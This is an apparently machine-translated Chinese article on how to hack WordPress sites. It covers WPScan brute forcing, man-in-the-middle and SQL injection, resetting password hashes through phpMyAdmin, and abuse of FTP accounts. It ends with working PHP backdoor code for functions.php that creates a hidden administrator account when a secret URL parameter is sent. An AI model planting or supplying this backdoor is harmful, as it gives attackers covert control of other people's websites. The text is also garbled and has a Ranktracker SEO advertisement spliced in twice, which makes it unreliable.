
如何破解WordPress](introduction.png)
介绍
在开始这篇文章之前,我们想让你知道,黑客攻击是非法的,我们不鼓励任何恶意的活动。这篇文章只是为了让你了解骗子是如何工作的,以及各种网站安全方法对防止他们的危害是多么重要。我们来讨论一下。
- 骗子是如何入侵WordPress的?
- 如何保护你的WP网站不受骗子攻击?
所以,不用再多说了,让我们开始讨论这个话题。
如何在网上黑掉WordPress网站?
!如何在线破解WordPress网站 (Source:wpsecurityninja.com)
###使用WPScan。 WPScan是一个WP安全扫描器,可以帮助网站所有者检查他们的WordPress网站是否有漏洞,但这个扫描器也被黑客利用来实现他们黑掉网站的动机。
WPScan允许网站所有者和管理员指定WP用户账户和暴力破解密码,是获得未经授权访问WP账户的首要步骤。
(使用WPScan暴力破解用户名和密码。源于此。Medium)
MIM攻击。
在用户使用类似局域网的情况下,中间人(MIM)攻击可以很容易地进行。非加密的用户登录是一个软目标,因为所有的细节都可以通过纯文本看到。
参与进行这些类型的攻击的软件可以发现被破坏的主题、插件并可以列举用户。
(来源:《中国新闻周刊》。Medium)
SQL注入。
SQL注入攻击被认为是用于渗透网站的最突出攻击。这些攻击的目标是网站的后台网关,并允许黑客通过实施妥协的命令来渗透它们。
有效SEO的一体化平台
每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台
(来源:[secure.wphackedhelp.com](https://secure.wphackedhelp.com/blog/hack-wordpress-website/#How_To_Hack_A_WordPress_Website_8211_Various_Ways))
这些渗透还允许黑客修改数据库和命令,删除或窃取网站信息。
由于这 些SQL攻击发现了易受攻击和未打补丁的网站,它们使黑客的任务变得容易和成功。
###利用我的SQL/cPanel。
在这种方法中,黑客创建一个假账户或修改当前WP网站用户的密码。黑客试图通过打开PhpMyAdmin来渗透到cPanel。他们在寻找以_users结尾的表,并找到他们想要修改的用户。
这将允许他们改变他们计划入侵的用户的凭证。他们通过打开在线MD5生成器追踪用户并改变用户的密码(来自user_pass字段),并将其替换为他们想要的密码,然后点击#。
有效SEO的一体化平台
每个成功的企业背后都有一个强大的SEO活动。但是,有无数的优化工具和技术可供选择,很难知道从哪里开始。好了,不要再害怕了,因为我已经得到了可以帮助的东西。介绍一下Ranktracker有效的SEO一体化平台
! 利用我的SQL/cPanel (用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。源于此。firstsiteguide.com)
用户名、用户的哈希密码、他们的电子邮件ID等都存储在wp_users数据库表中。
###编辑Functions.php。
黑客也会进入cPanel来修改Functions.php 文件。通过解锁文件管理器,他们寻找活动主题的文件夹。 从public_html/wp_content/themes文件夹中,他们追踪主题,并通过放置他们破坏的代码来编辑 functions.php。由于黑客已经创建了一个新的账户,所以黑客已经在进行中了。一旦完成,他们就会擦除被破坏的代码。
通过FTP创建一个新的用户账户。
一般来说,FTP账户帮助网站所有者在其网站内生成一个目录,允许特定的用户使用其登录凭证上传/下载他们的文件。
这些文件也可以在互联网上查看。
> 在网站上创建一个FTP账户的步骤:。 > > - 输入所需的数据 > - 输入新的FTP用户的用户名 > - 输入用于分配账户的密码,以便通过FTP访问 > - 输入用于通过FTP访问的目录名称 > - 写下您希望分配给该文件夹的所需MB空间。 > - 然后按*"创建 "*按钮创建新帐户。
新用户必须加载以下数据才能通过FTP获得访问权。
地址/主机名/地址:yourdomain.com或ftp.yourdomain.com
用户/用户:[email protected]
密码:分配给这个FTP账户的El密码
端 口:21 命名用于上传/下载文件的文件夹。
新用户将对所选目录及其包含的所有子目录拥有读写权限。
例如,如果你创建了客户用户,并给他访问/home / user / public_html的权限
通过后门渗透。
渗透网站的恶意方式是通过后门。无论是想进入你的网站的诈骗者,还是想通过后门进入重新获得网站访问权的受害用户,他们都需要遵循以下步骤。
在某些情况下,当通过FTP创建一个新的用户账户或进行密码重置时,但没有得到理想的结果,用户可能想通过后门进入黑掉他们的网站,找回他们的管理权限。
创建后门的步骤:
- 打开 functions.php 文件并粘贴下面的代码。
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
- 稍后保存更改。
